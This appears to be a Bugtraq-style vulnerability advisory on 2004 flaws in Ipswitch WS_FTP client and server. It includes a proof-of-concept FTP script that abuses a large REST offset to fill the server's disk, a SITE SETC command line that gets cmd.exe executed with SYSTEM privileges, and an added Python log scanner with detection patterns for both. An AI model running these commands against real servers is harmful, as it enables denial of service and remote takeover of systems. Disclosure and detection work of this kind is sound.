Ipswitch WS_FTP Multiple Vulnerabilities
BID:9953
Info
| Bugtraq ID: | 9953 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 23 2004 12:00AM |
| Updated: | Mar 23 2004 12:00AM |
| Credit: | Discovery is credited to Hugh Mann <[email protected]>. |
| Vulnerable: | Ipswitch WS_FTP Pro 8.0 3; Ipswitch WS_FTP Pro 8.0 2; Ipswitch WS_FTP Pro 7.5; Ipswitch WS_FTP Pro 6.0; Ipswitch WS FTP Server 4.0 2; Ipswitch WS FTP Server 4.0 1; Ipswitch WS FTP Server 4.0; Ipswitch WS FTP Server 3.4; Ipswitch WS FTP Server 3.1.3; Ipswitch WS FTP Server 3.1.2; Ipswitch WS FTP Server 3.1.1; Ipswitch WS FTP Server 3.1; Ipswitch WS FTP Server 3.0 1; Ipswitch WS FTP Server 3.0; Ipswitch WS FTP Server 2.0.4; Ipswitch WS FTP Server 2.0.3; Ipswitch WS FTP Server 2.0.2; Ipswitch WS FTP Server 2.0.1; Ipswitch WS FTP Server 2.0; Ipswitch WS FTP Server 1.0.5; Ipswitch WS FTP Server 1.0.4; Ipswitch WS FTP Server 1.0.3; Ipswitch WS FTP Server 1.0.2; Ipswitch WS FTP Server 1.0.1 |
| Not Vulnerable: | |
Discussion
Multiple vulnerabilities have been identified in the WS_FTP Server and client applications. These vulnerabilities may allow remote attackers to execute arbitrary code, cause a denial of service, and gain administrative-level access to a server.
The issues include two remote buffer overflow vulnerabilities in the client, a denial of service vulnerability in the server and an access validation issue in the server leading to remote command execution with SYSTEM privileges.
These issues are undergoing further analysis. This BID will be divided into separate issues as analysis is completed.
Exploit / POC
The following proof of concept has been provided:
Save this in a file called ftpcmds.txt, after changing the FTP server name,
username, and password.
<<<<<<<<<<<<
open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit
>>>>>>>>>>>>
Then start it:
C:\>ftp -s:ftpcmds.txt
to see the result. It will create a 1GB file and then delete it.
SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
220 site command modified
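A defensive check for the two server-side patterns in the proof of concept above, as an added example that is not part of the original advisory or of any Ipswitch code: it scans an FTP control-channel command stream for an upload that follows a very large REST offset and for any SITE SETC command. The log layout, the `MAX_REST_OFFSET` threshold and the function name `scan` are assumptions.

```python
"""Flag FTP control-channel patterns like those in the proof of concept.

Added example. The log layout ("<session-id> <FTP command line>") and the
threshold are assumptions, not WS_FTP Server's own log format or settings.
"""

MAX_REST_OFFSET = 64 * 1024 * 1024  # assumed policy limit for a restart offset

# Constructed sample: commands the ftp.exe script sends, then a benign session.
# 1073741822 + a 2-byte upload = 2**30 bytes, the 1GB file the text mentions.
SAMPLE_LOG = (
    "s1 USER username\n"
    "s1 STOR 2byte_2.txt\n"
    "s1 DELE 2byte_2.txt\n"
    "s1 REST 1073741822\n"
    "s1 PORT 10,0,0,5,4,1\n"
    "s1 STOR 2byte.txt\n"
    "s1 SITE SETC <HostName>\t3V1L\tcmd.exe\t/C echo yup\t16\n"
    "s2 USER alice\n"
    "s2 REST 2048\n"
    "s2 STOR report.pdf\n"
)


def scan(log_text, max_offset=MAX_REST_OFFSET):
    """Return (session, reason, detail) tuples for suspicious commands."""
    pending = {}  # session -> REST offset waiting for the next transfer
    findings = []
    for raw in log_text.split("\n"):
        session, _, line = raw.partition(" ")
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "REST":
            try:
                pending[session] = int(arg)
            except ValueError:
                findings.append((session, "malformed-rest", arg))
        elif verb in ("STOR", "APPE"):
            offset = pending.pop(session, 0)  # REST applies to one transfer
            if offset > max_offset:
                findings.append((session, "rest-then-upload", f"{offset} {arg}"))
        elif verb == "RETR":
            pending.pop(session, None)
        elif verb == "SITE" and arg.upper().split(None, 1)[:1] == ["SETC"]:
            findings.append((session, "site-setc", arg))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `rest-then-upload` finding corresponds to the disk-filling sequence in the script, and `site-setc` to the command-modification request shown after it; the benign session with a small restart offset produces no finding.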
The following exploit code has been provided:
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- Ipswitch Homepage (Ipswitch)
- ALLO ALLO WS_FTP Server ("Hugh Mann")
- How to crash a harddisk - the Ipswitch WS_FTP Server way ("Hugh Mann")
- Open the WS_FTP Server backdoor to SYSTEM ("Hugh Mann")
- Think of the buffers! Won't somebody think of the buffers?! ("Hugh Mann")